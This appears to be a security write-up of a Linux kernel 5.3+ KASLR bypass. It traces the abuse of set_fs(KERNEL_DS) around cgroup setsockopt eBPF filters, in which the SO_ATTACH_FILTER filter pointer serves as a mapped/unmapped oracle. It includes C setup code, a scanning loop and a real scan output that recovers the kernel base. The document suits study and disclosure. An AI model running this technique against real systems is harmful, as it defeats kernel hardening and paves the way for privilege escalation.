Since Linux kernel 5.3, a user with the CAP_NET_ADMIN capability can attach an eBPF filter to the setsockopt() syscall using the BPF_CGROUP_SETSOCKOPT attach type.
The filter runs on every setsockopt() call made on a socket that belongs to the target cgroup (the root cgroup works too).
If any such filter is attached to a cgroup, an attacker can test whether a given kernel address is mapped, and use that to bypass KASLR.
Preconditions:
- The Linux kernel version is 5.3 or higher.
- A user with CAP_NET_ADMIN has attached an eBPF filter to the setsockopt() syscall. (Any filter will do, as long as the attacker's call passes it.)
- The attacker already has an unprivileged shell.
The attacker can learn which kernel addresses (pages) are actually mapped, which is enough to bypass KASLR.
In the setsockopt() syscall, the BPF_CGROUP_RUN_PROG_SETSOCKOPT() macro checks whether a setsockopt filter is attached.
https://elixir.bootlin.com/linux/v5.3.18/source/net/socket.c#L2062
https://elixir.bootlin.com/linux/v5.3.18/source/include/linux/bpf-cgroup.h#L297 (The cgroup_bpf_enabled static key is incremented when a privileged user attaches an eBPF filter.)
If a filter is attached, the kernel passes the arguments to it and lets the call proceed only if the filter returns a non-zero value. (This lets a CAP_NET_ADMIN user flexibly restrict setsockopt() parameters.)
https://elixir.bootlin.com/linux/v5.3.18/source/kernel/bpf/cgroup.c#L1007
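For reference, the smallest filter that satisfies this check is "r0 = 1; exit", the same two instructions the verifier prints in the PoC. The source of set_meaningless_filter is not part of this report, so the following is only a sketch of what such a helper might look like, using the raw bpf(2) syscall. The names allow_all_prog, sys_bpf and attach_allow_all are made up for illustration, and the code assumes UAPI headers from 5.3 or later.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <linux/bpf.h>
#include <stdint.h>
#include <string.h>
#include <sys/syscall.h>
#include <unistd.h>

/* Two-instruction program: "r0 = 1; exit".
 * Returning 1 lets every setsockopt() call through. */
const struct bpf_insn allow_all_prog[] = {
    { .code = BPF_ALU64 | BPF_MOV | BPF_K, .dst_reg = BPF_REG_0, .imm = 1 },
    { .code = BPF_JMP | BPF_EXIT },
};

/* Thin wrapper, because glibc does not export bpf(2). */
long sys_bpf(int cmd, union bpf_attr *attr)
{
    return syscall(__NR_bpf, cmd, attr, sizeof(*attr));
}

/* Hypothetical helper: load the program and attach it to the cgroup v2
 * directory at cgroup_path. Returns 0 on success, -1 on error (errno set). */
int attach_allow_all(const char *cgroup_path)
{
    union bpf_attr attr;
    int prog_fd, cg_fd;
    long ret;

    memset(&attr, 0, sizeof(attr));
    attr.prog_type = BPF_PROG_TYPE_CGROUP_SOCKOPT;
    attr.expected_attach_type = BPF_CGROUP_SETSOCKOPT;
    attr.insns = (uint64_t)(uintptr_t)allow_all_prog;
    attr.insn_cnt = sizeof(allow_all_prog) / sizeof(allow_all_prog[0]);
    attr.license = (uint64_t)(uintptr_t)"GPL";
    prog_fd = (int)sys_bpf(BPF_PROG_LOAD, &attr);
    if (prog_fd < 0)
        return -1;

    cg_fd = open(cgroup_path, O_RDONLY);
    if (cg_fd < 0) {
        close(prog_fd);
        return -1;
    }

    memset(&attr, 0, sizeof(attr));
    attr.target_fd = cg_fd;          /* cgroup to attach to */
    attr.attach_bpf_fd = prog_fd;    /* program to attach */
    attr.attach_type = BPF_CGROUP_SETSOCKOPT;
    ret = sys_bpf(BPF_PROG_ATTACH, &attr);

    close(cg_fd);
    close(prog_fd);
    return ret < 0 ? -1 : 0;
}
```

A caller would run this as root with the cgroup path, for example attach_allow_all("/sys/fs/cgroup/unified/"), mirroring the sudo invocation in the PoC.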
Before running the eBPF filter, the kernel copies the arguments into kernel memory, because the user could otherwise change the values at any time, even after the filter has approved them.
https://elixir.bootlin.com/linux/v5.3.18/source/kernel/bpf/cgroup.c#L1001
Once the arguments live in kernel memory, copy_from_user() would normally fail on them, because the pointer is no longer a userland address.
To work around this, the kernel calls set_fs(KERNEL_DS), which temporarily extends the range of addresses accepted as userland to include kernel memory. (This hack is sometimes used to invoke syscalls from kernel code.)
https://elixir.bootlin.com/linux/v5.3.18/source/net/socket.c#L2074
This is fine for optval itself, because at that point optval is guaranteed to be a kernel pointer.
But if the structure that optval points to contains a pointer of its own (one that is expected to point into userland), it can be abused.
If an attacker stores a kernel address in that embedded pointer, copy_from_user() on it also succeeds because of set_fs(KERNEL_DS).
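The argument above can be illustrated with a toy model of the address-limit check. This is not kernel code: model_access_ok is a made-up stand-in for the range check behind copy_from_user(), and the two limits are assumed x86-64 values (4-level paging) chosen for illustration only.

```c
#include <stdbool.h>
#include <stdint.h>

/* Assumed limits, for illustration only. */
#define MODEL_USER_DS   0x00007ffffffff000ULL /* top of userland */
#define MODEL_KERNEL_DS UINT64_MAX            /* whole address space */

/* Simplified range check: the access [addr, addr + size) is accepted
 * only if it does not wrap and ends at or below the current limit. */
bool model_access_ok(uint64_t addr, uint64_t size, uint64_t limit)
{
    uint64_t end = addr + size;

    if (end < addr) /* wrapped around */
        return false;
    return end <= limit;
}
```

With the normal limit, model_access_ok(0xffffffff9d200000, 8, MODEL_USER_DS) is false, so a kernel address in the embedded pointer would be rejected. With MODEL_KERNEL_DS the same call is true, which is the situation the attacker relies on.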
The optval of SO_ATTACH_FILTER contains such a pointer.
The code below copies optval into fprog.
https://elixir.bootlin.com/linux/v5.3.18/source/net/core/sock.c#L996
But fprog itself contains a pointer, the filter member.
https://elixir.bootlin.com/linux/v5.3.18/source/include/uapi/linux/filter.h#L31
If the attacker sets the filter member to a kernel address, the kernel loads the filter from that address and checks whether it is a valid BPF filter.
https://elixir.bootlin.com/linux/v5.3.18/source/net/core/filter.c#L1476 ( load filter )
https://elixir.bootlin.com/linux/v5.3.18/source/net/core/filter.c#L1297 ( check filter )
If the kernel address is not mapped, the kernel returns EFAULT.
If the kernel address is mapped, validation will almost always fail because the memory does not hold a valid BPF filter.
In that case the kernel returns EINVAL.
The attacker can therefore tell which addresses are mapped (EINVAL) and which are not (EFAULT).
- Check the kernel version. (The exploit works on Ubuntu 18.04 after upgrading the kernel and rebooting.)
garyo@garyo:~$ apt list "linux-image*" --installed | grep -v dbg
WARNING: apt does not have a stable CLI interface. Use with caution in scripts.
Listing...
linux-image-5.3.0-53-generic/bionic-updates,bionic-security,now 5.3.0-53.47~18.04.1 amd64 [installed]
- Attach a filter to the root cgroup to meet the precondition. The filter below always returns 1.
garyo@garyo:~$ sudo ./set_meaningless_filter /sys/fs/cgroup/unified/
Output from kernel verifier:
0: (b7) r0 = 1
1: (95) exit
processed 2 insns (limit 1000000) max_states_per_insn 0 total_states 0 peak_states 0 mark_read 0
- Run the exploit. _text is at 0xffffffff9d200000, and the exploit reports a valid kernel address range starting at 0xffffffff9d200000. (The scan takes several minutes; to check more quickly, increase the interval from 0x100000 to a larger value.)
garyo@garyo:~$ ./kaslr_bypass 0xffff000000000000 0xffffffffffff0000 0x100000
Checking addr from 0xffff000000000000 to 0xffffffffffff0000 by 0x100000bytes
0xffff000000000000 : INvalid
0xffff95e940000000 : valid
0xffff95e9c0000000 : INvalid
0xffffb00a80000000 : valid
0xffffb00a80600000 : INvalid
0xffffb00a80700000 : valid
0xffffb00a80800000 : INvalid
0xffffb00a88000000 : valid
0xffffb00a90000000 : INvalid
0xffffd00a7be00000 : valid
0xffffd00a7fe00000 : INvalid
0xffffe88b00000000 : valid
0xffffe88b02000000 : INvalid
0xfffffe0000000000 : valid
0xfffffe0000600000 : INvalid
0xfffffe0000700000 : valid
0xfffffe0000800000 : INvalid
0xfffffe0000900000 : valid
0xfffffe0000a00000 : INvalid
0xfffffe0000d00000 : valid
0xfffffe0000e00000 : INvalid
0xfffffe0000f00000 : valid
0xfffffe0001000000 : INvalid
0xfffffe0001100000 : valid
0xfffffe0001200000 : INvalid
0xfffffe0001300000 : valid
0xfffffe0001400000 : INvalid
0xffffffff9d200000 : valid
0xffffffff9e100000 : INvalid
0xffffffff9e200000 : valid
0xffffffff9e700000 : INvalid
0xffffffff9e800000 : valid
0xffffffff9eb00000 : INvalid
0xffffffff9ee00000 : valid
0xffffffff9f400000 : INvalid
0xffffffffc0400000 : valid
0xffffffffc0900000 : INvalid
garyo@garyo:~$ sudo cat /proc/kallsyms | grep "T _text"
ffffffff9d200000 T _text
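The scan itself can be sketched as a loop that probes each address and prints a line only when the verdict changes, which is the shape of the output above. This is an illustration under assumptions, not the real kaslr_bypass: scan_range and probe_fn are hypothetical names, and demo_probe is a fake oracle so the loop can be tried without a vulnerable kernel.

```c
#include <inttypes.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* Oracle callback: returns true if addr looks mapped. */
typedef bool (*probe_fn)(uint64_t addr);

/* Fake oracle for demonstration: pretends [0x3000, 0x5000) is mapped. */
bool demo_probe(uint64_t addr)
{
    return addr >= 0x3000 && addr < 0x5000;
}

/* Probe start, start + step, ... below end. Print the first address and
 * every address where the verdict flips. Returns the number of lines
 * printed. */
unsigned scan_range(uint64_t start, uint64_t end, uint64_t step,
                    probe_fn is_mapped)
{
    unsigned printed = 0;
    bool have_prev = false, prev = false;
    uint64_t addr = start;

    if (step == 0)
        return 0;

    while (addr < end) {
        bool cur = is_mapped(addr);

        if (!have_prev || cur != prev) {
            printf("0x%016" PRIx64 " : %s\n", addr,
                   cur ? "valid" : "INvalid");
            printed++;
        }
        have_prev = true;
        prev = cur;

        /* Stop before addr + step reaches end or wraps past 2^64,
         * which matters when scanning the top of the address space. */
        if (end - addr <= step)
            break;
        addr += step;
    }
    return printed;
}
```

For example, scan_range(0x1000, 0x8000, 0x1000, demo_probe) prints three lines, for 0x1000, 0x3000 and 0x5000. A real run would pass a callback built on the SO_ATTACH_FILTER oracle instead of demo_probe.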